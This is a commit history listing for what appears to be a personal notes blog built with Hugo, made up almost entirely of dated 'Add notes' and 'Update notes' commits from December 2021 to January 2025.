Compare commits

...

464 Commits

SHA1 Message Date
63a2dcfdee Add notes for 2025-01-03 2025-01-03 12:37:39 +03:00
e7d7d4af89 Add notes 2024-12-04 16:27:49 +03:00
bd2d9779bb Add notes 2024-11-19 10:40:23 +03:00
47b96e8370 Add notes for 2024-10-08 2024-10-08 13:46:23 +03:00
512848fc73 Add notes for 2024-10-03 2024-10-03 11:51:44 +03:00
f8a1876ad2 Add notes for 2024-09-29 2024-09-30 07:56:53 +03:00
bb1367025a Add notes for 2024-09-23 2024-09-23 13:10:20 +03:00
dabbc20806 Update notes for 2024-09-16 2024-09-17 08:11:03 +04:00
edd2a8b306 Add docs again 2024-09-17 08:02:34 +04:00
842373d26f Update themes/hugo-theme-bootstrap4-blog 2024-09-17 08:01:55 +04:00
35342f95dc Add notes for 2024-09-16 2024-09-16 22:52:51 +04:00
79708bd30c Add notes for 2024-09-14 2024-09-14 23:02:16 +03:00
a5298945a3 Add notes for 2024-09 2024-09-09 10:20:09 +03:00
062019463c Add docs 2024-08-28 11:35:14 +03:00
f1c25111d0 Add notes 2024-08-28 11:35:05 +03:00
da6d73bc1f content/post/2024-07.md: fix spaces 2024-08-22 09:51:08 +03:00
7be53639dc Add content/posts/2024-08.md 2024-08-16 19:57:30 -07:00
64b8957945 Update notes 2024-08-07 08:54:13 -07:00
89d1b61442 Update notes for 2024-07-11 2024-07-11 13:08:22 +03:00
668947909a Add notes 2024-07-02 11:12:03 +03:00
7858008918 Add notes for 2024-06-21 2024-06-23 09:34:49 +03:00
c3436ea6c2 Add notes for 2024-06-18 2024-06-18 17:30:08 +03:00
bf4a6402d7 Add notes 2024-06-16 16:40:54 +03:00
8383cd466b Add notes for 2024-06-03 2024-06-03 17:31:03 +03:00
6d574d645d Add notes for 2024-05-28 2024-05-28 16:40:32 +03:00
befe3a3a58 Add notes for 2024-05-27 2024-05-27 21:40:09 +03:00
39d8d0876c Add notes for 2024-05-20 2024-05-20 17:34:14 +03:00
28a0c82e96 Minor syntax fix in example 2024-05-16 08:27:56 +03:00
7fc97884df Add notes for 2024-05-13 2024-05-13 16:24:11 +03:00
223453adbb Add notes for 2023-05-13 2024-05-13 08:21:17 +03:00
1b523bf055 Add notes for 2024-05-05 2024-05-05 21:43:52 +03:00
908a75a5c7 Add notes for 2024-05-01 2024-05-01 17:10:05 +03:00
e323c15e8b Add notes for 2024-04-29 2024-04-29 17:21:28 +03:00
8f156a0365 Add notes 2024-04-27 11:22:58 +03:00
515cc0650f Add notes 2024-04-25 15:28:35 +03:00
6db3da2739 Add notes 2024-04-18 17:00:25 +03:00
60b244486f Add notes 2024-04-18 09:38:02 +03:00
efd8eb7f79 Add notes 2024-04-16 09:35:30 +03:00
281827944a Add notes for 2024-04-12 2024-04-12 20:40:52 +03:00
864b3b136e Add notes 2024-04-09 16:50:56 +03:00
01a2ff5bfd Add notes 2024-04-04 10:23:49 +03:00
d71c430a7d Add notes 2024-03-25 18:53:18 +03:00
0e43fc97d7 Add notes for 2024-03-19 2024-03-19 16:24:20 +03:00
90c4d46607 Add notes 2024-03-19 09:01:13 +03:00
83c053f7ee Add notes for 2024-03-13 2024-03-14 09:29:05 +03:00
ba68787282 Update notes for 2024-03-11 2024-03-11 21:58:15 +03:00
1fc45e8f1b Add notes for 2024-03-11 2024-03-11 18:04:40 +03:00
11f1935f85 Add notes for 2024-03-08 2024-03-08 17:31:19 +03:00
5ff70af33b Add notes for 2024-03 2024-03-04 10:02:14 +03:00
b60a58f56a Fix date for 2024-02 frontmatter 2024-03-01 09:55:02 +03:00
cc28c0ccdc Add notes for 2024-02-29 2024-02-29 16:38:38 +03:00
1e87242956 Add notes for 2024-02-29 2024-02-29 09:41:44 +03:00
483a170f06 Add notes 2024-02-27 17:18:35 +03:00
0692b8666c Add notes for 2024-02-23 2024-02-24 20:44:15 +03:00
b2eaff29b1 Add notes for 2024-02-20 2024-02-20 22:55:09 +03:00
da0fd61b7e Add notes for 2024-02-19 2024-02-19 16:48:20 +03:00
3f4b66bd08 Add notes for 2024-02 2024-02-06 11:45:02 +03:00
ed290fb6f8 Add notes for 2024-01-29 2024-02-05 11:09:40 +03:00
63c20dbef9 Add notes for 2024-01-27 2024-01-28 09:23:40 +03:00
300b2e4271 Notes for 2024-01-23 2024-01-24 08:24:50 +03:00
57fe0587a4 Add notes 2024-01-18 15:59:49 +03:00
20ace46614 Add notes 2024-01-10 17:21:12 +03:00
3475d4fd5d Add notes for 2024-01-10 2024-01-10 08:34:16 +03:00
1dfb54ef6b Update notes for 2024-01-07 2024-01-07 22:18:43 +03:00
82c79fc257 Add notes for 2024-01-07 2024-01-07 20:43:02 +03:00
cf5c1e2155 Add notes for 2024-01-06 2024-01-06 17:46:07 +03:00
7418dae4b9 Add notes 2024-01-05 15:45:46 +03:00
264cdcf1db Add notes 2023-12-29 12:08:57 +03:00
293b500b26 content/posts/2023-07.md: minor grammar fix 2023-12-27 10:48:32 +03:00
17a241de5b Add notes for 2023-12-20 2023-12-21 10:09:15 +03:00
7695eacf7a Add notes 2023-12-18 23:15:27 +03:00
f4c985c16b Add notes for 2023-12-12 2023-12-12 14:57:07 +03:00
bc6412de09 Add notes for 2023-12-08 2023-12-09 09:55:16 +03:00
2ecafafc17 Notes for 2023-12-08 2023-12-08 16:32:48 +03:00
804a505ae2 docs: regenerate 2023-12-06 20:57:19 +03:00
6c5fa7375f Fix notes for 2023-11 2023-12-06 20:57:07 +03:00
f2bee38014 Add notes for 2023-12-05 2023-12-06 09:55:57 +03:00
a50fe66c78 Add notes 2023-12-02 10:38:09 +03:00
177c3b796d Add notes for 2023-11-23 2023-11-23 16:15:13 +03:00
eb218389a0 Add notes for 2023-11-18 2023-11-19 14:29:52 +03:00
1dd5900fbf Add notes for 2023-11-16 2023-11-16 17:25:15 +03:00
d14dd7114a Add notes for 2023-11-11 2023-11-13 16:54:36 +03:00
01fb17950b Add notes 2023-11-08 08:20:31 +03:00
c6d514bef9 Add notes for 2023-11-02 2023-11-02 20:58:43 +03:00
34523acc47 Add notes for 2023-10-27 2023-10-27 17:09:30 +03:00
3a4ecbd82d Add notes 2023-10-24 23:26:01 +03:00
c9bcfca903 Add notes for 2023-10-16 2023-10-16 17:03:59 +03:00
7e3a7951d6 Add notes for 2023-10-13 2023-10-13 17:17:41 +03:00
8d39fc7d71 Fix typo 2023-10-08 22:04:41 +03:00
22dd379e9a Add notes for 2023-10-07 2023-10-08 10:57:53 +03:00
98cdd21cb5 Add notes for 2023-10-06 2023-10-06 15:19:34 +03:00
62838a091c Add notes for 2023-10-05 2023-10-05 17:58:03 +03:00
cb40610726 Update notes 2023-10-04 09:24:33 +03:00
249d9be387 Update notes 2023-09-30 13:07:23 +03:00
4a02a78186 Add notes for 2023-09-25 2023-09-25 17:38:05 +03:00
aa6cbb488d Add notes for 2023-09-22 2023-09-23 10:15:01 +03:00
aeaa397612 Add notes for 2023-09-19 2023-09-19 21:13:52 +03:00
d60b85433d Update notes for 2023-09-16 2023-09-16 23:38:04 +03:00
202d3fb88f Add notes for 2023-09-16 2023-09-16 20:24:24 +03:00
afcbc67874 Add notes for 2023-09-13 2023-09-14 20:57:25 +03:00
22e47beeb6 Add notes for 2023-09-10 2023-09-11 09:18:52 +03:00
223979f267 Add notes for 2023-09-09 2023-09-10 09:58:29 +03:00
28d62f1c0c Update notes for 2023-09-08 2023-09-09 00:25:48 +03:00
34bf124d5d Add notes for 2023-09-08 2023-09-09 00:25:12 +03:00
011a1ec9db Add notes for 2023-09-03 2023-09-04 09:16:51 +03:00
45781d590d Add notes for 2023-09-02 2023-09-02 17:37:15 +03:00
d8e0004240 Add notes 2023-09-01 08:10:02 +03:00
bfb7da50af Add notes for 2023-08-31 2023-08-31 17:36:25 +03:00
6ec5e4b006 Add notes 2023-08-30 19:16:01 +03:00
1529cfd80b Add notes 2023-08-29 21:38:23 +03:00
6737febf95 Add notes for 2023-08-26 2023-08-26 19:27:57 +03:00
6fbcc342d2 Add notes for 2023-08-25 2023-08-25 17:06:19 +03:00
e83e681706 Add notes for 2023-08-24 2023-08-24 21:58:03 +03:00
33061dbe3a Add notes for 2023-08-23 2023-08-24 09:03:46 +03:00
d2ad21bde1 Add notes for 2023-08-22 2023-08-22 17:28:49 +03:00
f38ecfb75e Add notes for 2023-08-18 2023-08-18 23:54:07 +03:00
24dd6fefb5 Add notes for 2023-08-14 2023-08-14 18:38:03 +02:00
a659eef05f Fix name 2023-08-14 10:39:08 +02:00
9944f61ed5 Add notes for 2023-08-12 2023-08-13 05:54:16 +02:00
87ccbfc0f0 Add notes for 2023-08-11 2023-08-11 12:25:50 +02:00
929ce9685a Add notes for 2023-08-08 2023-08-08 12:54:39 +02:00
e0f9e484ee Add notes for 2023-08-07 2023-08-07 10:48:56 +02:00
021a92c0d9 Add notes for 2023-08-05 2023-08-05 17:27:43 +03:00
c97d005aa4 Add notes for 2023-08-04 2023-08-04 18:05:44 +03:00
190a1ee4a3 Add notes for 2023-07-31 2023-08-02 23:04:11 +03:00
9a2de13f21 Add notes for 2023-07-28 2023-07-28 12:18:39 +03:00
c644f40491 Add notes 2023-07-28 11:59:59 +03:00
6e701ee9c2 Add notes for 2023-07-25 2023-07-25 23:54:53 +03:00
e4dc8a3ed0 Add notes for 2023-07-22 2023-07-22 09:19:48 +03:00
74f4afe72a Add notes for 2023-07-20 2023-07-20 16:02:38 +03:00
8bebf47078 Add some days of notes 2023-07-19 12:27:43 +03:00
8c1e898683 Add notes for 2023-07-08 2023-07-08 23:20:53 +03:00
89d3fb717c Add notes for 2023-07-05 2023-07-05 16:36:30 +03:00
309ffad285 Add notes for 2023-07-03 2023-07-04 08:03:36 +03:00
0fab2a0f28 Add notes 2023-07-01 17:17:31 +03:00
ae41ef3682 Add notes for 2023-06-28 2023-06-28 20:11:34 +03:00
4415eec1a0 Add notes for 2023-06-19 2023-06-19 16:26:41 +03:00
6985b53a7b Add notes for 2023-06-17 2023-06-17 23:14:32 +03:00
df88592009 Add notes for 2023-06-14 2023-06-14 20:29:35 +03:00
3a68bc3cc7 Add notes for 2023-06-13 2023-06-13 20:58:57 +03:00
943fa8f1a2 Add notes for 2023-06-09 2023-06-10 09:17:08 +03:00
363dbb4505 Add notes for 2023-06-08 2023-06-08 17:04:20 +03:00
bda3cb4cd1 Add notes for 2023-06-06 2023-06-06 16:54:25 +03:00
33c42ecd49 Add notes for 2023-06-04 2023-06-04 11:00:30 +03:00
a9dc98b2dd Add notes for 2023-06-02 2023-06-02 16:33:48 +03:00
0b0d2ea87d Add notes 2023-06-02 08:53:06 +03:00
825385562d Add notes for 2023-05-30 2023-05-30 20:19:17 +03:00
416d2bc7a7 Add notes for 2023-05-26 2023-05-26 17:04:18 +03:00
7cde2ad26b Add notes for 2023-05-22 2023-05-23 08:49:01 +03:00
5fbc484c80 Add notes 2023-05-20 11:10:05 +03:00
aa5fab70b7 Add notes for 2023-05-18 2023-05-18 16:47:51 +03:00
d8be9c001c Add notes for 2023-05-12 2023-05-12 14:02:55 +03:00
a4a725f22e Add notes for 2023-05-11 2023-05-12 08:33:20 +03:00
572f4639ac Add notes for 2023-05-04 2023-05-04 17:27:29 +03:00
b4a5ec05e7 content/posts/2023-04.md: update image format scores
After re-calculation with ssimulacra2 v2.1.
2023-05-04 14:44:51 +03:00
e1aa40cf0e Add notes 2023-05-04 08:38:27 +03:00
bd36e93cd9 Update notes 2023-05-03 17:10:37 +03:00
820114f464 Add notes 2023-05-02 10:39:34 +03:00
ad8516bbb3 Add notes for 2023-04-27 2023-04-27 13:10:13 -07:00
0ca3cadbef Add notes for 2023-04-22 2023-04-22 16:37:19 -07:00
c20f1e1f89 Add notes for 2023-04-20 2023-04-20 22:44:18 -07:00
b024eb1f94 Add notes for 2023-04-18 2023-04-18 11:08:15 -07:00
85438953ce Add notes for 2023-04-06 2023-04-06 16:13:30 +03:00
5a0b3aaec1 Add notes for 2023-04-02 2023-04-02 09:16:25 +03:00
a2875a3811 Add notes for 2023-03-30 2023-03-30 16:59:20 +03:00
479bb9684a Update notes for 2023-03-28 2023-03-28 23:38:38 +03:00
5cd298a37a Add notes for 2023-03-28 2023-03-28 17:04:54 +03:00
37bdf2645f Add notes for 2023-03-27 2023-03-27 10:03:45 +03:00
11646971a9 Add notes for 2023-03-24 2023-03-24 13:19:13 +03:00
534f0d9cf8 Add notes for 2023-03-21 2023-03-22 08:28:33 +03:00
66a1f54e3a Add notes for 2023-03-21 2023-03-21 16:35:41 +03:00
cfdd1cb7fa Add notes for 2023-03-19 2023-03-19 19:48:06 +03:00
e926834065 Add notes for 2023-03-18 2023-03-18 17:42:40 +03:00
68b378845a Add notes for 2023-03-15 2023-03-15 08:03:48 +03:00
e9dd768d66 content/posts/2023-01.md: fix typos 2023-03-14 14:30:17 +03:00
40fe625083 Add notes 2023-03-13 21:22:25 +03:00
345cd4365b Add notes for 2023-03-10 2023-03-10 17:34:05 +03:00
bee6532af2 Add notes for 2023-03-09 2023-03-09 17:01:50 +03:00
5787bc326c Add notes for 2023-03-08 2023-03-08 18:53:32 +03:00
f5d24aa841 Add notes for 2023-03-07 2023-03-07 17:15:26 +03:00
2b98b5cda7 Add notes for 2023-03-07 2023-03-07 10:05:12 +03:00
19f8de4481 Update notes 2023-03-07 09:53:31 +03:00
7a48286d6b Add notes 2023-03-01 08:30:25 +03:00
e06160976c Add notes 2023-02-26 19:59:12 +03:00
2e80702de4 Add notes for 2023-02-22 2023-02-22 21:37:12 +03:00
ba6f826201 content/posts/2022-08.md: syntax fix 2023-02-22 11:59:48 +03:00
47f2c6c17f Add notes for 2023-02-21 2023-02-21 20:46:53 +03:00
a667e6986e Add notes for 2023-02-15 2023-02-15 19:47:13 +03:00
617c0eec3c Add notes for 2023-02-14 2023-02-14 23:13:35 +03:00
0b64999280 Add notes for 2023-02-12 2023-02-13 10:33:39 +03:00
d5214f02e1 Add notes for 2023-02-08 2023-02-09 08:50:54 +03:00
16ba5723eb Add notes for 2023-01-31 2023-01-31 22:20:38 +03:00
81f04f48ad Add notes for 2023-01-29 2023-01-29 18:19:31 +03:00
2c7f6b3e39 Add notes 2023-01-22 21:53:45 +03:00
ddb1ce8f4e Add notes for 2023-01-17 2023-01-17 22:38:55 +03:00
3f4e42fe37 Add notes for 2023-01-15 2023-01-15 08:10:16 +03:00
db4b0a6fd6 Add notes for 2023-01-12 2023-01-12 23:11:42 +03:00
967b16a966 Add notes for 2023-01-10 2023-01-10 22:22:03 +03:00
d1278a67d8 Add notes for 2023-01-04 2023-01-04 17:08:14 +03:00
676eefafbb content/posts/2022-11.md: Fix syntax for image 2023-01-04 10:53:02 +03:00
b781203a58 Add notes for 2023-01-01 2023-01-01 10:12:13 +02:00
9768a0fe57 Add notes for 2022-12-29 2022-12-29 08:32:08 +02:00
2e6c267397 Add notes for 2022-12-28 2022-12-28 22:55:34 +02:00
bf122d4ac3 Add notes for 2022-12-25 2022-12-25 16:48:19 +02:00
249a63404b Add notes for 2022-12-23 2022-12-23 10:04:37 +02:00
3be39e67fa Add notes for 2022-12-21 2022-12-21 20:39:09 +02:00
8354acdbdd Add notes for 2022-12-18 2022-12-19 07:03:13 +02:00
54769fcb04 Add notes for 2022-12-15 2022-12-15 16:41:04 +03:00
aaec17b94d Add notes for 2022-12-14 2022-12-14 22:14:03 +03:00
9c1e60426a Add notes for 2022-12-12 2022-12-12 18:17:33 +03:00
1bafe6ce71 Add notes for 2022-12-08 2022-12-08 18:59:57 +02:00
4200ae4189 Add notes for 2022-12-07 2022-12-07 22:59:37 +01:00
12b4f1660d Add notes for 2022-12-03 2022-12-04 03:19:49 +03:00
1dd80f769a Add notes for 2022-12-02 2022-12-03 10:46:29 +03:00
651148cf0a Add notes for 2022-11-30 2022-11-30 18:21:20 +03:00
0599df9bed Add notes for 2022-11-30 2022-11-30 12:35:31 +03:00
4f254af2f3 Update notes for 2022-11-28 2022-11-28 23:19:19 +03:00
8199de67ad Add notes for 2022-11-28 2022-11-28 17:42:46 +03:00
f5750dab39 Add notes for 2022-11-27 2022-11-27 13:52:43 +03:00
6240bdf5ad content/posts/2022-11.md: fix typo 2022-11-27 12:38:48 +03:00
59cd155eb3 Add notes for 2022-11-26 2022-11-26 17:38:27 +03:00
b5b28f2d78 Add notes for 2022-11-24 2022-11-24 17:41:34 +03:00
b9d764d026 Add notes for 2022-11-23 2022-11-23 17:10:47 +03:00
de6172b45a Add notes for 2022-11-21 2022-11-21 10:31:02 +03:00
4e6a8ec51b Add notes for 2022-11-09 2022-11-10 15:45:04 +03:00
c63abf656d Add notes for 2022-11-07 2022-11-07 17:18:14 +03:00
7544ee54ea Add notes for 2022-11-01 2022-11-01 22:12:24 +03:00
d48d74c981 Add notes for 2022-10-31 2022-10-31 16:59:47 +03:00
5ae92a2334 Add notes for 2022-10-30 2022-10-31 07:48:00 +03:00
3633377854 Add notes for 2022-10-28 2022-10-28 13:17:35 +03:00
189f33e1ce Add notes for 2022-10-26 2022-10-26 17:50:40 +03:00
5da2c1eff7 Add notes for 2022-10-25 2022-10-26 09:15:29 +03:00
3e8da69de7 Add notes for 2022-10-25 2022-10-25 16:38:17 +03:00
3f0d06239b Add notes for 2022-10-22 2022-10-23 12:33:23 +03:00
46a9178bdb Add notes for 2022-10-19 2022-10-19 21:32:01 +03:00
7713ecefa8 Add notes for 2022-10-18 2022-10-18 22:12:42 +03:00
a1ddc29951 Add notes for 2022-10-17 2022-10-17 15:58:02 +03:00
96cdb781fb Add notes 2022-10-15 17:38:47 +03:00
55a231611f Add notes for 2022-10-12 2022-10-13 07:10:59 +03:00
57288fad56 Add notes for 2022-10-09 2022-10-09 21:19:38 +03:00
510dd965ea Add notes 2022-10-07 21:29:35 +03:00
42f0fc6147 Add notes for 2022-10-05 2022-10-05 17:22:42 +03:00
9a88b6c1b5 Add notes for 2022-10-03 2022-10-03 16:26:30 +03:00
652f181273 Add notes for 2022-10-01 2022-10-01 19:47:37 +03:00
c7aec5606c Add notes for 2022-09-30 2022-09-30 17:29:50 +03:00
96f47ec7b5 Update notes for 2022-09-28 2022-09-28 21:23:10 +03:00
f1bb112554 Add notes for 2022-09-29 2022-09-28 17:10:23 +03:00
a2ca9483c4 content/posts/2022-08.md: add update to issue 2022-09-27 14:35:26 +03:00
98a3695d0d Add notes for 2022-09-26 2022-09-26 17:17:19 +03:00
a156315103 Update notes for 2022-09-25 2022-09-25 21:02:46 +03:00
ecb09f0a54 Add notes for 2022-09-25 2022-09-25 14:32:38 +03:00
062450e84f Add notes for 2022-09-24 2022-09-24 09:26:29 +03:00
c9e2325f34 Add notes for 2022-09-23 2022-09-23 16:49:58 +03:00
ae01de27c5 Add notes for 2022-09-22 2022-09-22 21:59:15 +03:00
fbf08b7003 Add notes for 2022-09-19 2022-09-19 15:58:41 +03:00
3b78d2f7e4 Add notes for 2022-09-18 2022-09-18 21:04:01 +03:00
1b15837e4e Add notes for 2022-09-16 2022-09-16 17:09:32 +03:00
e0d4d1ff7f Add notes for 2022-09-14 2022-09-15 08:37:57 +03:00
954f3598bd content/posts/2022-09.md: fix date 2022-09-15 08:37:36 +03:00
547a92723d Add notes for 2022-09-12 2022-09-12 17:07:29 +03:00
147ad86375 Add notes for 2022-09-12 2022-09-12 11:35:57 +03:00
69392070de Add notes for 2022-09-09 2022-09-09 17:29:51 +03:00
aa77e80c44 Add notes for 2022-09-08 2022-09-08 17:47:25 +03:00
ef3b4f1176 Add notes for 2022-09-07 2022-09-07 18:00:26 +03:00
5972b89839 Add notes for 2022-09-06 2022-09-06 17:48:46 +03:00
ac66d6c1a9 Add notes for 2022-09-05 2022-09-05 16:59:11 +03:00
6ce43e6a95 Add notes for 2022-09-01 and 2022-09-02 2022-09-02 16:41:19 +03:00
baf1cea539 Add notes 2022-08-31 17:37:28 +03:00
d9e2669a3d Add notes for 2022-08-30 2022-08-30 17:45:35 +03:00
49af872267 Add notes for 2022-08-29 2022-08-29 04:54:12 +03:00
5084b5ca5e Add notes for 2022-08-24 2022-08-24 21:24:07 -07:00
64d5b998f9 Add notes for 2022-08-23 2022-08-23 12:14:14 -07:00
8e6c83a5e1 Add notes for 2022-08-20 2022-08-20 22:37:35 -07:00
daf4a646ed Add notes for 2022-08-19 2022-08-19 21:55:36 -07:00
fc0a9ad944 Update notes for 2022-08-18 2022-08-18 22:43:37 -07:00
e203ee6dcc Add notes for 2022-08-18 2022-08-18 13:45:48 -07:00
6c61d1c102 Add notes for 2022-08-15 2022-08-15 18:46:57 -07:00
498690ac42 Update notes for 2022-08-13 2022-08-13 21:51:49 -07:00
ad4f3486fd Add notes for 2022-08-13 2022-08-13 21:37:48 -07:00
0207664d3a Update notes for 2022-08-05 2022-08-05 21:09:24 +03:00
073e814b1d Update notes for 2022-08-05 2022-08-05 21:05:13 +03:00
5060774b90 Add notes for 2022-08-05 2022-08-05 19:10:21 +03:00
2d8532e10e Add notes for 2022-08-03 2022-08-03 21:01:39 +03:00
ad8e345f72 Regenerate docs 2022-08-01 16:36:13 +03:00
8a10872f53 themes: update theme submodule 2022-08-01 16:35:32 +03:00
a7b90e58ab Update notes for 2022-07-30 2022-07-31 15:49:35 +03:00
d9bfdbef2b Add notes for 2022-07-28 2022-07-28 16:55:36 +03:00
109c63e10d Add notes for 2022-07-27 2022-07-27 23:02:19 +03:00
41476b9c63 Add notes for 2022-07-25 2022-07-25 22:33:25 +03:00
8ead752ee8 Update notes for 2022-07-22 2022-07-22 22:28:51 +03:00
b98d07bc1f Add notes for 2022-07-22 2022-07-22 16:42:06 +03:00
a0456cd0f7 Update notes 2022-07-21 10:03:16 +03:00
daf209efb9 Update notes for 2022-07-18 2022-07-18 16:45:55 +03:00
92b115ef62 Add notes for 2022-07-18 2022-07-18 12:32:23 +03:00
6fb5aa2be0 Add notes for 2022-07-17 2022-07-17 22:45:16 +03:00
05bf1fa02d Add notes for 2022-07-14 2022-07-14 16:46:24 +03:00
3c61d0a06b Update notes 2022-07-12 12:15:17 +03:00
11ce30438c Add notes for 2022-07-08 2022-07-08 15:49:45 +03:00
19715c3295 Add notes for 2022-07-06 2022-07-07 10:02:04 +03:00
fc1e83e76d Add notes for 2022-07-04 2022-07-04 22:10:02 +03:00
9a5acf2e32 Add notes for 2022-07-04 2022-07-04 17:20:01 +03:00
4d4bde3474 Add notes for 2022-07-03 2022-07-04 09:25:14 +03:00
05cf7a26ec Add notes for 2022-06-30 2022-06-30 16:48:03 +03:00
53f60284e2 Add notes for 2022-06-29 2022-06-30 09:41:54 +03:00
368d60df56 Add notes for 2022-06-26 2022-06-26 18:11:33 +03:00
b913ff5353 Add notes for 2022-06-24 2022-06-24 14:49:37 +03:00
8db6f5489a Add notes for 2022-06-22 2022-06-23 08:40:53 +03:00
fb24585ec8 Add notes 2022-06-21 16:59:04 +03:00
71d92e0a5e Add notes for 2022-06-18 2022-06-18 20:39:37 +03:00
388b19b513 Add notes for 2022-06-17 2022-06-17 16:46:56 +03:00
7e9f2f8226 Update notes for 2022-06-16 2022-06-16 19:51:59 +03:00
ec0b3c243f Add notes for 2022-06-16 2022-06-16 16:25:51 +03:00
4e58a25e25 Add notes for 2022-06-13 2022-06-14 08:45:07 +03:00
8a06bab2c6 Regenerate docs 2022-06-13 15:53:16 +03:00
6debe66cfc content/posts/2022-03.md: syntax 2022-06-09 09:41:49 +03:00
1a90a46f05 Add notes for 2022-06-08 2022-06-08 15:36:09 +03:00
3761d1a56f Update notes for 2022-06-06 2022-06-06 16:54:08 +03:00
31b329595f Add notes for 2022-06-06 2022-06-06 09:45:43 +03:00
e478850def Add notes for 2022-05-30 2022-05-30 16:00:02 +03:00
b5642c03f2 Add notes for 2022-05-28 2022-05-28 18:25:00 +03:00
ad9f569b0d Update notes for 2022-05-27 2022-05-27 16:46:18 +03:00
3e8dc96a81 Add notes for 2022-05-27 2022-05-27 12:47:33 +03:00
ce7c03cbfd Add notes for 2022-05-26 2022-05-26 15:01:15 +03:00
cc24e999df Add notes for 2022-05-25 2022-05-25 17:05:40 +03:00
f783b75f4e Add notes for 2022-05-24 2022-05-24 22:10:47 +03:00
6cdc293aa1 Add notes for 2022-05-23 2022-05-24 09:42:54 +03:00
9e0a16160e Add notes for 2022-05-14 2022-05-15 15:31:43 +03:00
6ebb69e95d Add notes for 2022-05-13 2022-05-13 16:56:22 +03:00
7916af5417 Add notes for 2022-05-13 2022-05-13 10:28:23 +03:00
f07c04bd7e Add notes for 2022-05-12 2022-05-13 08:39:15 +03:00
efcc5b5ede Update notes for 2022-01 2022-05-12 12:51:45 +03:00
2f09551962 Add notes for 2022-05-10 2022-05-10 16:35:50 +03:00
a29f0f9c1c Add notes for 2022-05-07 2022-05-08 21:23:36 +03:00
3105a92d7f Regenerate docs 2022-05-05 16:58:42 +03:00
da7b6e2f20 Update notes for 2020-02 2022-05-05 16:50:10 +03:00
f8d002dbd1 Update notes for 2022-05-05 2022-05-05 12:47:48 +03:00
3890c1fd7d Add notes for 2022-05-05 2022-05-05 12:46:13 +03:00
ca294919f2 Update notes for 2022-05-04 2022-05-04 16:48:24 +03:00
b0ba32c97c Add notes for 2022-05-04 2022-05-04 11:09:45 +03:00
cf8f13d09c Add notes for 2022-04-27 2022-04-28 08:49:31 +03:00
5cfe954a53 Add notes for 2022-04-27 2022-04-27 09:58:45 +03:00
4ddc675e55 Update date on 2022-04 content 2022-04-27 08:44:10 +03:00
18978ad1ed Add notes for 2022-04-25 2022-04-26 09:47:01 +03:00
4d5c669d89 Add notes for 2022-04-24 2022-04-24 21:06:28 +03:00
278770414a Add notes for 2022-04-23 2022-04-23 13:05:02 +03:00
4f023e2bcc Update notes for 2022-04-18 2022-04-18 21:43:48 +03:00
9d880998ad Add notes for 2022-04-18 2022-04-18 10:45:12 +03:00
9b88b678c1 Add notes for 2022-04-16 2022-04-16 22:41:45 +03:00
138713baad Add notes for 2022-04-13 2022-04-13 16:52:34 +03:00
bad7d9bb7f Add notes for 2022-04-10 2022-04-10 23:38:31 +03:00
d7abff0a5b Update notes for 2022-04-04 2022-04-04 21:34:14 +03:00
549f6cab80 Add notes for 2022-04-04 2022-04-04 19:15:58 +03:00
054d666fe0 Add notes for 2022-03-31 2022-03-31 16:09:14 +03:00
79b5f023e1 Update notes for 2022-03-29 2022-03-29 21:26:07 +03:00
123d90165f Add notes for 2022-03-29 2022-03-29 16:01:48 +03:00
7b99451f26 Add notes for 2022-03-28 2022-03-28 16:09:34 +03:00
f385e2738b Update note for 2022-03-26 2022-03-26 19:13:21 +03:00
debc252d0e Add notes for 2022-03-26 2022-03-26 10:33:53 +03:00
311a7a4b47 Add notes for 2022-03-25 2022-03-25 12:19:45 +03:00
c2e1140591 Add notes for 2022-03-25 2022-03-25 12:17:36 +03:00
31690d514c Update notes for 2022-03-24 2022-03-24 22:54:47 +03:00
93e828a901 Add notes for 2022-03-24 2022-03-24 22:14:56 +03:00
017a1f5502 Regenerate public 2022-03-22 22:04:11 +03:00
8f7c87002b Fix tweet shortcode 2022-03-22 22:03:59 +03:00
9fc0935448 Add notes for 2022-03-22 2022-03-22 22:03:45 +03:00
dcd2a9b7e5 Add notes for 2022-03-22 2022-03-22 16:02:11 +03:00
c4c651385a Add notes for 2022-03-16 2022-03-16 18:32:01 +03:00
5a6fcdd20e Add notes for 2022-03-13 2022-03-13 22:08:57 +03:00
dd179fada7 Add notes for 2022-03-10 2022-03-10 14:35:14 +03:00
2569fa215b Add notes for 2022-03-05 2022-03-05 23:14:13 +03:00
27acbac859 Add notes for 2022-03-04 2022-03-04 15:30:06 +03:00
7453499827 Add notes for 2022-03-01 2022-03-01 17:48:40 +03:00
7a0cfadc3d Update notes 2022-03-01 17:17:27 +03:00
d6c9b70e3a Add notes for 2022-02-26 2022-02-26 12:49:19 +03:00
edacbe8b63 Add notes for 2022-02-24 2022-02-24 19:15:45 +03:00
3baa93a1f2 Add notes 2022-02-23 14:46:23 +03:00
9b4498de04 Add notes for 2022-02-14 2022-02-14 16:43:12 +03:00
e3109b7483 Update notes 2022-02-14 09:40:59 +03:00
67a05b80ea Update notes for 2022-02-10 2022-02-11 09:41:05 +03:00
564bb11984 Add notes for 2022-02-10 2022-02-10 20:35:40 +03:00
9a1280a7ed Add notes for 2022-02-08 2022-02-08 19:07:20 +03:00
2903ae05a0 Add notes for 2022-02-07 2022-02-07 11:39:54 +03:00
69c7f3b684 Fix notes for 2022-01 2022-02-07 09:49:34 +03:00
e4536c5d60 Add content for 2022-02-03 2022-02-04 08:15:52 +03:00
df9927603f Add notes for 2022-02-02 2022-02-02 23:51:22 +03:00
b6951579f6 Update notes for 2022-02-01 2022-02-02 09:11:43 +03:00
b3177cd44e Add notes for 2022-02-01 2022-02-01 17:54:45 +03:00
ed9fb3fe99 Add notes for 2022-01-30 2022-01-31 09:00:59 +03:00
673f718ef3 Add notes for 2022-01-28 2022-01-28 16:59:40 +03:00
9efd56b405 Add notes 2022-01-27 16:58:05 +03:00
6884711948 Add notes for 2022-01-19 2022-01-19 18:14:26 +03:00
69f733f2be Add notes for 2022-01-09 2022-01-12 19:55:47 +02:00
0ed959e085 Update syntax in notes for 2021-12 2022-01-09 10:39:51 +02:00
6770385f36 Add notes for 2022-01-06 2022-01-06 15:48:37 +02:00
2c3ab62925 Regenerate docs 2022-01-01 15:21:47 +02:00
49148c043c Add notes for 2022-01-01 2022-01-01 15:21:32 +02:00
4d35572e92 Add notes for 2021-12-29 2021-12-29 16:29:37 +02:00
6ff55cc003 Add notes for 2021-12-28 2021-12-28 13:24:23 +02:00
590558d0bf Add notes for 2021-12-19 2021-12-19 22:03:42 +02:00
f5a0ea201e Add notes for 2021-12-08 2021-12-08 19:34:39 +02:00
6b9ff040ed Add notes for 2021-12-08 2021-12-08 08:47:33 +02:00
